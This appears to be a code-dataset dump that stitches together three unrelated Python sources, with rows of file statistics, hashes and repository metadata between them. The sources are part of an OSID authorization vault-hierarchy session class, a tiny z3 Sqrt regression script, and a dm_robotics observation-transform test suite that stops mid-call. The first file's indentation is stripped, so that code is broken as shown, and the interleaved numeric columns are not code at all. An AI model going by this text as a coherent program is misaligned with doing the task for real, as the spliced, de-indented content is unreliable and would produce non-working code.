arg: ancestor_levels (cardinal): the maximum number of
ancestor levels to include. A value of 0 returns no
parents in the node.
arg: descendant_levels (cardinal): the maximum number of
descendant levels to include. A value of 0 returns no
children in the node.
arg: include_siblings (boolean): ``true`` to include the
siblings of the given node, ``false`` to omit the
siblings
return: (osid.authorization.VaultNode) - a vault node
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_bin_nodes
return objects.VaultNode(self.get_vault_node_ids(
vault_id=vault_id,
ancestor_levels=ancestor_levels,
descendant_levels=descendant_levels,
include_siblings=include_siblings)._my_map, runtime=self._runtime, proxy=self._proxy)
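    # Illustrative node retrieval sketch (hypothetical arguments): one
    # level of ancestors, two levels of descendants, no siblings.
    #
    #     node = hierarchy_session.get_vault_nodes(
    #         vault_id=vault_id,
    #         ancestor_levels=1,
    #         descendant_levels=2,
    #         include_siblings=False)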
class VaultHierarchyDesignSession(abc_authorization_sessions.VaultHierarchyDesignSession, osid_sessions.OsidSession):
"""This session defines methods for managing a hierarchy of ``Vault`` objects.
Each node in the hierarchy is a unique ``Vault``.
"""
_session_namespace = 'authorization.VaultHierarchyDesignSession'
def __init__(self, proxy=None, runtime=None, **kwargs):
# Implemented from template for
# osid.resource.BinHierarchyDesignSession.init_template
OsidSession.__init__(self)
OsidSession._init_catalog(self, proxy, runtime)
self._forms = dict()
self._kwargs = kwargs
if self._cataloging_manager is not None:
self._catalog_session = self._cataloging_manager.get_catalog_hierarchy_design_session()
else:
hierarchy_mgr = self._get_provider_manager('HIERARCHY')
self._hierarchy_session = hierarchy_mgr.get_hierarchy_design_session_for_hierarchy(
Id(authority='AUTHORIZATION',
namespace='CATALOG',
identifier='VAULT'),
proxy=self._proxy)
def get_vault_hierarchy_id(self):
"""Gets the hierarchy ``Id`` associated with this session.
return: (osid.id.Id) - the hierarchy ``Id`` associated with this
session
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_bin_hierarchy_id
if self._catalog_session is not None:
return self._catalog_session.get_catalog_hierarchy_id()
return self._hierarchy_session.get_hierarchy_id()
vault_hierarchy_id = property(fget=get_vault_hierarchy_id)
def get_vault_hierarchy(self):
"""Gets the hierarchy associated with this session.
return: (osid.hierarchy.Hierarchy) - the hierarchy associated
with this session
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_bin_hierarchy
if self._catalog_session is not None:
return self._catalog_session.get_catalog_hierarchy()
return self._hierarchy_session.get_hierarchy()
vault_hierarchy = property(fget=get_vault_hierarchy)
def can_modify_vault_hierarchy(self):
"""Tests if this user can change the hierarchy.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known performing any update
will result in a ``PermissionDenied``. This is intended as a
hint to an application that may opt not to offer these
operations to an unauthorized user.
return: (boolean) - ``false`` if changing this hierarchy is not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchyDesignSession.can_modify_bin_hierarchy_template
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
if self._catalog_session is not None:
return self._catalog_session.can_modify_catalog_hierarchy()
return True
@utilities.arguments_not_none
def add_root_vault(self, vault_id):
"""Adds a root vault.
arg: vault_id (osid.id.Id): the ``Id`` of a vault
raise: AlreadyExists - ``vault_id`` is already in hierarchy
raise: NotFound - ``vault_id`` not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchyDesignSession.add_root_bin_template
if self._catalog_session is not None:
return self._catalog_session.add_root_catalog(catalog_id=vault_id)
return self._hierarchy_session.add_root(id_=vault_id)
@utilities.arguments_not_none
def remove_root_vault(self, vault_id):
"""Removes a root vault from this hierarchy.
arg: vault_id (osid.id.Id): the ``Id`` of a vault
raise: NotFound - ``vault_id`` not a parent of ``child_id``
raise: NullArgument - ``vault_id`` or ``child_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchyDesignSession.remove_root_bin_template
if self._catalog_session is not None:
return self._catalog_session.remove_root_catalog(catalog_id=vault_id)
return self._hierarchy_session.remove_root(id_=vault_id)
@utilities.arguments_not_none
def add_child_vault(self, vault_id, child_id):
"""Adds a child to a vault.
arg: vault_id (osid.id.Id): the ``Id`` of a vault
arg: child_id (osid.id.Id): the ``Id`` of the new child
raise: AlreadyExists - ``vault_id`` is already a parent of
``child_id``
raise: NotFound - ``vault_id`` or ``child_id`` not found
raise: NullArgument - ``vault_id`` or ``child_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchyDesignSession.add_child_bin_template
if self._catalog_session is not None:
return self._catalog_session.add_child_catalog(catalog_id=vault_id, child_id=child_id)
return self._hierarchy_session.add_child(id_=vault_id, child_id=child_id)
@utilities.arguments_not_none
def remove_child_vault(self, vault_id, child_id):
"""Removes a child from a vault.
arg: vault_id (osid.id.Id): the ``Id`` of a vault
arg: child_id (osid.id.Id): the ``Id`` of the child
raise: NotFound - ``vault_id`` not parent of ``child_id``
raise: NullArgument - ``vault_id`` or ``child_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchyDesignSession.remove_child_bin_template
if self._catalog_session is not None:
return self._catalog_session.remove_child_catalog(catalog_id=vault_id, child_id=child_id)
return self._hierarchy_session.remove_child(id_=vault_id, child_id=child_id)
@utilities.arguments_not_none
def remove_child_vaults(self, vault_id):
"""Removes all children from a vault.
arg: vault_id (osid.id.Id): the ``Id`` of a vault
raise: NotFound - ``vault_id`` is not in hierarchy
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchyDesignSession.remove_child_bin_template
if self._catalog_session is not None:
return self._catalog_session.remove_child_catalogs(catalog_id=vault_id)
return self._hierarchy_session.remove_children(id_=vault_id)
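    # Illustrative design sketch (hypothetical Ids): building and tearing
    # down a two-level hierarchy with this session.
    #
    #     design_session.add_root_vault(parent_id)
    #     design_session.add_child_vault(parent_id, child_id)
    #     design_session.remove_child_vaults(parent_id)  # detach all children
    #     design_session.remove_root_vault(parent_id)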
| 45.960684
| 186
| 0.654709
| 18,342
| 161,322
| 5.587122
| 0.039581
| 0.014823
| 0.028503
| 0.035939
| 0.855863
| 0.834454
| 0.811727
| 0.78943
| 0.773466
| 0.743138
| 0
| 0.000752
| 0.266275
| 161,322
| 3,509
| 187
| 45.973782
| 0.865029
| 0.55957
| 0
| 0.606403
| 0
| 0
| 0.055129
| 0.006857
| 0
| 0
| 0
| 0.000285
| 0
| 1
| 0.13371
| false
| 0.001883
| 0.019774
| 0
| 0.317326
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a8071813703c97e154c1a58b74d953608becaf8d
| 235
|
py
|
Python
|
old-regressions/python/tst6.py
|
muchang/z3test
|
e3e7739f98b7aa85427fcb8a39a4c675132a896e
|
[
"MIT"
] | 23
|
2015-04-20T08:51:00.000Z
|
2021-11-15T12:20:59.000Z
|
old-regressions/python/tst6.py
|
muchang/z3test
|
e3e7739f98b7aa85427fcb8a39a4c675132a896e
|
[
"MIT"
] | 18
|
2016-03-02T15:17:42.000Z
|
2021-12-16T22:10:05.000Z
|
old-regressions/python/tst6.py
|
muchang/z3test
|
e3e7739f98b7aa85427fcb8a39a4c675132a896e
|
[
"MIT"
] | 30
|
2015-05-30T15:29:17.000Z
|
2022-02-25T15:58:58.000Z
|
# Copyright (c) 2015 Microsoft Corporation
from z3 import *
print(simplify(Sqrt(2)).sexpr())
set_option(":pp-decimal-precision", 50, pp_decimal=True)
print(simplify(Sqrt(2)).sexpr())
set_option(precision=20)
print(simplify(Sqrt(2)))
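# An informal reading of this regression (an assumption, not z3
# documentation): simplify(Sqrt(2)) yields an irrational algebraic number,
# and the pretty-printer options set above control whether it is rendered
# symbolically or as a decimal approximation, and to how many digits.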
| 23.5
| 56
| 0.744681
| 35
| 235
| 4.914286
| 0.6
| 0.226744
| 0.296512
| 0.313953
| 0.372093
| 0.372093
| 0.372093
| 0
| 0
| 0
| 0
| 0.055556
| 0.080851
| 235
| 9
| 57
| 26.111111
| 0.740741
| 0.170213
| 0
| 0.333333
| 0
| 0
| 0.109375
| 0.109375
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.166667
| 0
| 0.166667
| 0.5
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
a81eba16cf9a55afaac7c0432d5bc776ba731b35
| 40,893
|
py
|
Python
|
py/agentflow/preprocessors/observation_transforms_test.py
|
wx-b/dm_robotics
|
5d407622360ccf7f0b4b50bcee84589e2cfd0783
|
[
"Apache-2.0"
] | 128
|
2021-09-08T18:39:39.000Z
|
2022-03-27T11:29:05.000Z
|
py/agentflow/preprocessors/observation_transforms_test.py
|
wx-b/dm_robotics
|
5d407622360ccf7f0b4b50bcee84589e2cfd0783
|
[
"Apache-2.0"
] | 7
|
2021-10-11T14:26:17.000Z
|
2022-03-15T17:26:45.000Z
|
py/agentflow/preprocessors/observation_transforms_test.py
|
LaudateCorpus1/dm_robotics
|
647bc810788c74972c1684a8d2e4d2dfd2791485
|
[
"Apache-2.0"
] | 8
|
2021-09-08T18:25:49.000Z
|
2022-02-21T23:45:16.000Z
|
# Copyright 2020 DeepMind Technologies Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# python3
"""Tests for observations_transforms."""
import copy
from typing import Mapping, Optional, Type
from absl.testing import absltest
from absl.testing import parameterized
import cv2
import dm_env
from dm_env import specs
from dm_robotics.agentflow import spec_utils
from dm_robotics.agentflow import testing_functions
from dm_robotics.agentflow.preprocessors import observation_transforms
from dm_robotics.agentflow.preprocessors import timestep_preprocessor
from dm_robotics.transformations import transformations as tr
import numpy as np
_DEFAULT_TYPE = np.float64
def scalar_array_spec(name: str, dtype: Type[np.floating] = _DEFAULT_TYPE):
return specs.Array(shape=(), dtype=dtype, name=name)
@parameterized.parameters(
(observation_transforms.CastPreprocessor, float, float, float),
(observation_transforms.CastPreprocessor, np.float32, float,
float),
(observation_transforms.CastPreprocessor, np.float64, float,
float),
(observation_transforms.CastPreprocessor, float, np.float32,
np.float32),
(observation_transforms.CastPreprocessor, np.float32, np.float32,
np.float32),
(observation_transforms.CastPreprocessor, np.float64, np.float32,
np.float32),
(observation_transforms.CastPreprocessor, float, np.float64,
np.float64),
(observation_transforms.CastPreprocessor, np.float32, np.float64,
np.float64),
(observation_transforms.CastPreprocessor, np.float64, np.float64,
np.float64),
(observation_transforms.DowncastFloatPreprocessor, float, float,
float),
(observation_transforms.DowncastFloatPreprocessor, np.float32,
float, np.float32),
(observation_transforms.DowncastFloatPreprocessor, np.float64,
float, float),
(observation_transforms.DowncastFloatPreprocessor, float,
np.float32, np.float32),
(observation_transforms.DowncastFloatPreprocessor, np.float32,
np.float32, np.float32),
(observation_transforms.DowncastFloatPreprocessor, np.float64,
np.float32, np.float32),
(observation_transforms.DowncastFloatPreprocessor, float,
np.float64, float),
(observation_transforms.DowncastFloatPreprocessor, np.float32,
np.float64, np.float32),
(observation_transforms.DowncastFloatPreprocessor, np.float64,
np.float64, np.float64),
(observation_transforms.DowncastFloatPreprocessor, np.float128,
np.float64, np.float64),
    # Non-floating point types should not be interfered with.
(observation_transforms.DowncastFloatPreprocessor, np.int32,
np.float64, np.int32),
)
class CastAndDowncastPreprocessorTest(parameterized.TestCase):
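  # The class-level @parameterized.parameters decorator above expands every
  # test method in this class once per parameter tuple of
  # (processor_type, src_type, transform_type, expected_type), which is why
  # the class subclasses parameterized.TestCase.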
def testCastPreprocessor_Array(
self, processor_type: timestep_preprocessor.TimestepPreprocessor,
src_type: Type[np.number], transform_type: Type[np.number],
expected_type: Type[np.number]):
# Arrange:
name = testing_functions.random_string(3)
processor = processor_type(transform_type)
input_observation_spec = {
name: specs.Array(shape=(2,), dtype=src_type, name=name),
}
expected_observation_spec = {
name: specs.Array(shape=(2,), dtype=expected_type, name=name),
}
input_reward_spec = scalar_array_spec(dtype=src_type,
name='reward')
expected_reward_spec = scalar_array_spec(dtype=expected_type,
name='reward')
input_discount_spec = scalar_array_spec(dtype=src_type,
name='discount')
expected_discount_spec = scalar_array_spec(dtype=expected_type,
name='discount')
input_timestep_spec = spec_utils.TimeStepSpec(
observation_spec=input_observation_spec,
reward_spec=input_reward_spec,
discount_spec=input_discount_spec)
input_timestep = timestep_preprocessor.PreprocessorTimestep(
step_type=np.random.choice(list(dm_env.StepType)),
reward=src_type(0.1),
discount=src_type(0.2),
observation={name: np.asarray([0.3, 0.4], dtype=src_type)},
pterm=0.1,
result=None)
# Act:
spec_utils.validate_timestep(input_timestep_spec, input_timestep)
output_timestep_spec = processor.setup_io_spec(input_timestep_spec)
# Assert:
expected_timestep = timestep_preprocessor.PreprocessorTimestep(
step_type=input_timestep.step_type,
reward=expected_type(0.1),
discount=expected_type(0.2),
observation={name: np.asarray([0.3, 0.4], dtype=expected_type)},
pterm=input_timestep.pterm,
result=None)
self.assertEqual(output_timestep_spec.observation_spec,
expected_observation_spec)
self.assertEqual(output_timestep_spec.reward_spec, expected_reward_spec)
self.assertEqual(output_timestep_spec.discount_spec, expected_discount_spec)
output_timestep = processor.process(input_timestep)
spec_utils.validate_timestep(output_timestep_spec, output_timestep)
np.testing.assert_almost_equal(output_timestep.observation[name],
expected_timestep.observation[name])
np.testing.assert_almost_equal(output_timestep.reward,
expected_timestep.reward)
np.testing.assert_almost_equal(output_timestep.discount,
expected_timestep.discount)
def testCastPreprocessor_BoundedArray(
self, processor_type: timestep_preprocessor.TimestepPreprocessor,
src_type: Type[np.number], transform_type: Type[np.number],
expected_type: Type[np.number]):
"""Same as previous test, but using BoundedArray specs."""
# Arrange:
name = testing_functions.random_string(3)
processor = processor_type(transform_type)
input_minimum = np.asarray([0.3, 0.4], dtype=src_type)
input_maximum = np.asarray([0.5, 0.6], dtype=src_type)
input_observation_spec = {
name:
specs.BoundedArray(
shape=(2,),
dtype=src_type,
minimum=input_minimum,
maximum=input_maximum,
name=name),
}
input_reward_spec = scalar_array_spec(name='reward', dtype=src_type)
input_discount_spec = scalar_array_spec(name='discount', dtype=src_type)
input_timestep_spec = spec_utils.TimeStepSpec(
observation_spec=input_observation_spec,
reward_spec=input_reward_spec,
discount_spec=input_discount_spec)
input_timestep = timestep_preprocessor.PreprocessorTimestep(
step_type=np.random.choice(list(dm_env.StepType)),
reward=src_type(0.1),
discount=src_type(0.2),
observation={name: np.asarray([0.4, 0.5], dtype=src_type)},
pterm=0.1,
result=None)
# Act:
spec_utils.validate_timestep(input_timestep_spec, input_timestep)
output_timestep_spec = processor.setup_io_spec(input_timestep_spec)
# Assert:
expected_minimum = np.asarray([0.3, 0.4], dtype=expected_type)
expected_maximum = np.asarray([0.5, 0.6], dtype=expected_type)
expected_output_observation_spec = {
name:
specs.BoundedArray(
shape=(2,),
dtype=expected_type,
minimum=expected_minimum,
maximum=expected_maximum,
name=name),
}
expected_output_reward_spec = scalar_array_spec(
name='reward', dtype=expected_type)
expected_output_discount_spec = scalar_array_spec(
name='discount', dtype=expected_type)
expected_output_timestep = timestep_preprocessor.PreprocessorTimestep(
step_type=input_timestep.step_type,
reward=expected_type(0.1),
discount=expected_type(0.2),
observation={name: np.asarray([0.4, 0.5], dtype=expected_type)},
pterm=input_timestep.pterm,
result=None)
self.assertEqual(
set(output_timestep_spec.observation_spec.keys()),
set(expected_output_observation_spec.keys()))
spec_utils.verify_specs_equal_bounded(
output_timestep_spec.observation_spec[name],
expected_output_observation_spec[name])
self.assertEqual(output_timestep_spec.reward_spec,
expected_output_reward_spec)
self.assertEqual(output_timestep_spec.discount_spec,
expected_output_discount_spec)
output_timestep = processor.process(input_timestep)
spec_utils.validate_timestep(output_timestep_spec, output_timestep)
np.testing.assert_almost_equal(output_timestep.observation[name],
expected_output_timestep.observation[name])
np.testing.assert_almost_equal(output_timestep.reward,
expected_output_timestep.reward)
np.testing.assert_almost_equal(output_timestep.discount,
expected_output_timestep.discount)
def testCastPreprocessor_RewardArray(
self, processor_type: timestep_preprocessor.TimestepPreprocessor,
src_type: Type[np.number], transform_type: Type[np.number],
expected_type: Type[np.number]):
# Arrange:
name = testing_functions.random_string(3)
processor = processor_type(transform_type)
input_observation_spec = {
name: specs.Array(shape=(2,), dtype=src_type, name=name),
}
expected_observation_spec = {
name: specs.Array(shape=(2,), dtype=expected_type, name=name),
}
input_reward_spec = specs.Array(shape=(3,), dtype=src_type,
name='reward')
expected_reward_spec = specs.Array(
shape=(3,), dtype=expected_type, name='reward')
input_discount_spec = scalar_array_spec(dtype=src_type,
name='discount')
expected_discount_spec = scalar_array_spec(dtype=expected_type,
name='discount')
input_timestep_spec = spec_utils.TimeStepSpec(
observation_spec=input_observation_spec,
reward_spec=input_reward_spec,
discount_spec=input_discount_spec)
# Some test data that matches the src_type.
if np.issubdtype(src_type, np.floating):
numbers = (0.1, 0.2, 0.3, 0.4, 0.1)
elif np.issubdtype(src_type, np.integer):
numbers = (1, 2, 3, 4, 5)
else:
raise ValueError(
'Only ints and floats are currently supported.')
input_timestep = timestep_preprocessor.PreprocessorTimestep(
step_type=np.random.choice(list(dm_env.StepType)),
reward=numbers[0] * np.ones(shape=(3,), dtype=src_type),
discount=src_type(numbers[1]),
observation={name: np.asarray(numbers[2:4], dtype=src_type)},
pterm=numbers[4],
result=None)
# Act:
spec_utils.validate_timestep(input_timestep_spec, input_timestep)
output_timestep_spec = processor.setup_io_spec(input_timestep_spec)
# Assert:
expected_timestep = timestep_preprocessor.PreprocessorTimestep(
step_type=input_timestep.step_type,
reward=numbers[0] * np.ones(shape=(3,), dtype=expected_type),
discount=expected_type(numbers[1]),
observation={name: np.asarray(numbers[2:4], dtype=expected_type)},
pterm=input_timestep.pterm,
result=None)
self.assertEqual(output_timestep_spec.observation_spec,
expected_observation_spec)
self.assertEqual(output_timestep_spec.reward_spec, expected_reward_spec)
self.assertEqual(output_timestep_spec.discount_spec, expected_discount_spec)
output_timestep = processor.process(input_timestep)
spec_utils.validate_timestep(output_timestep_spec, output_timestep)
np.testing.assert_almost_equal(output_timestep.observation[name],
expected_timestep.observation[name])
np.testing.assert_almost_equal(output_timestep.reward,
expected_timestep.reward)
np.testing.assert_almost_equal(output_timestep.discount,
expected_timestep.discount)
class RenameObservationsTest(absltest.TestCase):
def test_rename_observations(self):
preprocessor = observation_transforms.RenameObservations(
obs_mapping={'foo': 'pow', 'faw': 'biz'})
# Generate the input spec and input timestep
input_obs_spec = {
'foo': specs.Array(shape=(2,), dtype=np.float64, name='foo'),
'bar': specs.Array(shape=(2,), dtype=np.float64, name='bar'),
'faw': specs.Array(shape=(2,), dtype=np.float64, name='faw'),
}
input_spec = _build_unit_timestep_spec(observation_spec=input_obs_spec)
input_obs = {'foo': [1., 2.], 'bar': [3., 4.], 'faw': [5., 6.]}
input_timestep = dm_env.TimeStep(
step_type=dm_env.StepType.MID,
reward=_DEFAULT_TYPE(0.1),
discount=_DEFAULT_TYPE(0.8),
observation=input_obs)
# Setup expectations.
expected_output_spec = input_spec.replace(observation_spec={
'pow': specs.Array(shape=(2,), dtype=np.float64, name='pow'),
'bar': specs.Array(shape=(2,), dtype=np.float64, name='bar'),
'biz': specs.Array(shape=(2,), dtype=np.float64, name='biz'),
})
# Check the spec
output_spec = preprocessor.setup_io_spec(input_spec)
self.assertEqual(output_spec.observation_spec,
expected_output_spec.observation_spec)
# Check the timestep.
output_timestep = preprocessor.process(input_timestep)
spec_utils.validate_timestep(output_spec, output_timestep)
np.testing.assert_array_equal(output_timestep.observation['pow'], [1., 2.])
def test_failure_when_renaming_missing_observations(self):
preprocessor = observation_transforms.RenameObservations(
obs_mapping={'foo': 'pow', 'faw': 'biz'})
# Generate the input spec and input timestep
input_obs_spec = {
'foo': specs.Array(shape=(2,), dtype=np.float64, name='foo'),
}
input_spec = _build_unit_timestep_spec(observation_spec=input_obs_spec)
# Calculating the output spec should fail.
with self.assertRaises(observation_transforms.MisconfigurationError):
preprocessor.setup_io_spec(input_spec)
def test_failure_for_duplicate_rename_targets(self):
obs_mapping = {'foo': 'pow', 'bar': 'pow'}
# Initialization should fail.
with self.assertRaises(observation_transforms.MisconfigurationError):
observation_transforms.RenameObservations(obs_mapping)
def test_failure_for_conflicting_rename_targets(self):
# Create the spec and timestep.
preprocessor = observation_transforms.RenameObservations(
obs_mapping={'foo': 'pow', 'faw': 'bar'})
# Generate the input spec and input timestep
input_obs_spec = {
'foo': specs.Array(shape=(2,), dtype=np.float64, name='foo'),
'faw': specs.Array(shape=(2,), dtype=np.float64, name='faw'),
'bar': specs.Array(shape=(2,), dtype=np.float64, name='bar'),
}
input_spec = _build_unit_timestep_spec(observation_spec=input_obs_spec)
# Calculating the output spec should fail.
with self.assertRaises(observation_transforms.MisconfigurationError):
preprocessor.setup_io_spec(input_spec)
class MergeObservationsTest(absltest.TestCase):
def test_merge_observation(self):
preprocessor = observation_transforms.MergeObservations(
obs_to_merge=['foo', 'bar'], new_obs='baz')
# Generate the input spec and input timestep
input_obs_spec = {
'foo': specs.Array(shape=(2,), dtype=np.float64, name='foo'),
'bar': specs.Array(shape=(2,), dtype=np.float64, name='bar'),
'faw': specs.Array(shape=(2,), dtype=np.float64, name='faw'),
}
input_spec = _build_unit_timestep_spec(observation_spec=input_obs_spec)
input_obs = {'foo': [1., 2.], 'bar': [3., 4.], 'faw': [3., 4.]}
input_timestep = dm_env.TimeStep(
step_type=dm_env.StepType.MID,
reward=_DEFAULT_TYPE(0.1),
discount=_DEFAULT_TYPE(0.8),
observation=input_obs)
# Setup expectations.
expected_output_spec = input_spec.replace(observation_spec={
'baz': specs.Array(shape=(4,), dtype=np.float64, name='baz'),
'faw': specs.Array(shape=(2,), dtype=np.float64, name='faw')
})
# Check the spec
output_spec = preprocessor.setup_io_spec(input_spec)
self.assertEqual(output_spec.observation_spec,
expected_output_spec.observation_spec)
# Check the timestep.
output_timestep = preprocessor.process(input_timestep)
spec_utils.validate_timestep(output_spec, output_timestep)
np.testing.assert_array_equal(output_timestep.observation['baz'],
[1., 2., 3., 4.])
def test_failure_when_merging_missing_observation(self):
preprocessor = observation_transforms.MergeObservations(
obs_to_merge=['foo', 'bar'], new_obs='baz')
# Generate the input spec
input_obs_spec = {
'foo': specs.Array(shape=(2,), dtype=np.float64, name='foo')}
input_spec = _build_unit_timestep_spec(observation_spec=input_obs_spec)
# Calculating the output spec should fail.
with self.assertRaises(observation_transforms.MisconfigurationError):
preprocessor.setup_io_spec(input_spec)
def test_failure_for_conflicting_new_name(self):
preprocessor = observation_transforms.MergeObservations(
obs_to_merge=['foo', 'bar'], new_obs='faw')
# Generate the input spec and input timestep
input_obs_spec = {
'foo': specs.Array(shape=(2,), dtype=np.float64, name='foo'),
'bar': specs.Array(shape=(2,), dtype=np.float64, name='bar'),
'faw': specs.Array(shape=(2,), dtype=np.float64, name='faw'),
}
input_spec = _build_unit_timestep_spec(observation_spec=input_obs_spec)
# Calculating the output spec should fail.
with self.assertRaises(observation_transforms.MisconfigurationError):
preprocessor.setup_io_spec(input_spec)
class CropImageObservationTest(absltest.TestCase):
def setUp(self):
super().setUp()
self._input_obs_name = 'input_obs'
self._output_obs_name = 'output_obs'
    # This has a shape of (4, 5, 3): a 4x5 image with 3 channels.
self._input_spec = testing_functions.random_array_spec(
shape=(4, 5, 3), dtype=float, name=self._input_obs_name)
self._input_observation_spec = {self._input_obs_name: self._input_spec}
self._input_obs_value = testing_functions.valid_value(self._input_spec)
self._input_timestep_spec = testing_functions.random_timestep_spec(
observation_spec=self._input_observation_spec)
self._input_timestep = testing_functions.random_timestep(
spec=self._input_timestep_spec,
observation={self._input_obs_name: self._input_obs_value})
spec_utils.validate_timestep(self._input_timestep_spec,
self._input_timestep)
def _get_expected_spec(self, value: np.ndarray):
return testing_functions.random_array_spec(
shape=value.shape, dtype=value.dtype, name=self._output_obs_name)
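  # A reading of the relative-crop convention, inferred from the cases below
  # (an assumption, not library documentation): crop width/height are
  # fractions of the source image, and the x/y offsets are fractions of the
  # margin left after cropping, so an offset of 0.5 centers the crop window.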
def testFullCrop(self):
"""Don't modify the input at all."""
processor = observation_transforms.CropImageObservation(
input_obs_name=self._input_obs_name,
output_obs_name=self._output_obs_name,
crop_width_relative=1.0,
crop_height_relative=1.0,
x_offset_relative=0.0,
y_offset_relative=0.0)
expected_value = self._input_obs_value
output_timestep_spec = processor.setup_io_spec(self._input_timestep_spec)
self.assertIn(self._output_obs_name, output_timestep_spec.observation_spec)
spec_utils.verify_specs_equal_unbounded(
self._input_spec.replace(name=self._output_obs_name),
output_timestep_spec.observation_spec[self._output_obs_name])
output_timestep = processor.process(self._input_timestep)
spec_utils.validate_timestep(output_timestep_spec, output_timestep)
np.testing.assert_almost_equal(
output_timestep.observation[self._output_obs_name], expected_value)
def testCropNoOffset(self):
"""Crop to a region that is in a corner of the original observation."""
processor = observation_transforms.CropImageObservation(
input_obs_name=self._input_obs_name,
output_obs_name=self._output_obs_name,
crop_width_relative=0.4,
crop_height_relative=0.75,
x_offset_relative=0.0,
y_offset_relative=0.0)
expected_value = self._input_obs_value[:3, :2]
output_timestep_spec = processor.setup_io_spec(self._input_timestep_spec)
self.assertIn(self._output_obs_name, output_timestep_spec.observation_spec)
spec_utils.verify_specs_equal_unbounded(
self._get_expected_spec(expected_value),
output_timestep_spec.observation_spec[self._output_obs_name])
output_timestep = processor.process(self._input_timestep)
spec_utils.validate_timestep(output_timestep_spec, output_timestep)
np.testing.assert_almost_equal(
output_timestep.observation[self._output_obs_name], expected_value)
def testSquareCropNoOffset(self):
"""Crop to a region that is in a corner of the original observation.
Leaving out the height parameter should default to a square crop.
"""
processor = observation_transforms.CropImageObservation(
input_obs_name=self._input_obs_name,
output_obs_name=self._output_obs_name,
crop_width_relative=0.4,
x_offset_relative=0.0,
y_offset_relative=0.0)
expected_value = self._input_obs_value[:2, :2]
output_timestep_spec = processor.setup_io_spec(self._input_timestep_spec)
self.assertIn(self._output_obs_name, output_timestep_spec.observation_spec)
spec_utils.verify_specs_equal_unbounded(
self._get_expected_spec(expected_value),
output_timestep_spec.observation_spec[self._output_obs_name])
output_timestep = processor.process(self._input_timestep)
spec_utils.validate_timestep(output_timestep_spec, output_timestep)
np.testing.assert_almost_equal(
output_timestep.observation[self._output_obs_name], expected_value)
def testCropWithOffset(self):
"""Crop to the center of the observation."""
processor = observation_transforms.CropImageObservation(
input_obs_name=self._input_obs_name,
output_obs_name=self._output_obs_name,
crop_width_relative=0.6,
crop_height_relative=0.5,
x_offset_relative=0.5,
y_offset_relative=0.5)
expected_value = self._input_obs_value[1:3, 1:4]
output_timestep_spec = processor.setup_io_spec(self._input_timestep_spec)
self.assertIn(self._output_obs_name, output_timestep_spec.observation_spec)
spec_utils.verify_specs_equal_unbounded(
self._get_expected_spec(expected_value),
output_timestep_spec.observation_spec[self._output_obs_name])
output_timestep = processor.process(self._input_timestep)
spec_utils.validate_timestep(output_timestep_spec, output_timestep)
np.testing.assert_almost_equal(
output_timestep.observation[self._output_obs_name], expected_value)
def testInvalidParams(self):
"""Ensure that invalid parameters cause Exceptions."""
# Zero width and height are invalid
with self.assertRaisesRegex(ValueError, 'zero'):
_ = observation_transforms.CropImageObservation(
input_obs_name=self._input_obs_name,
output_obs_name=self._output_obs_name,
crop_width_relative=0.,
crop_height_relative=0.,
x_offset_relative=0.,
y_offset_relative=0.)
# Negative width is invalid
with self.assertRaisesRegex(ValueError, 'width must be between'):
_ = observation_transforms.CropImageObservation(
input_obs_name=self._input_obs_name,
output_obs_name=self._output_obs_name,
crop_width_relative=-1.,
crop_height_relative=1.,
x_offset_relative=0.,
y_offset_relative=0.)
# Height > 1.0 is invalid
with self.assertRaisesRegex(ValueError, 'height must be between'):
_ = observation_transforms.CropImageObservation(
input_obs_name=self._input_obs_name,
output_obs_name=self._output_obs_name,
crop_width_relative=1.,
crop_height_relative=1.5,
x_offset_relative=0.,
y_offset_relative=0.)
# Offset > 1.0 is invalid
with self.assertRaisesRegex(ValueError, 'offset must be between'):
_ = observation_transforms.CropImageObservation(
input_obs_name=self._input_obs_name,
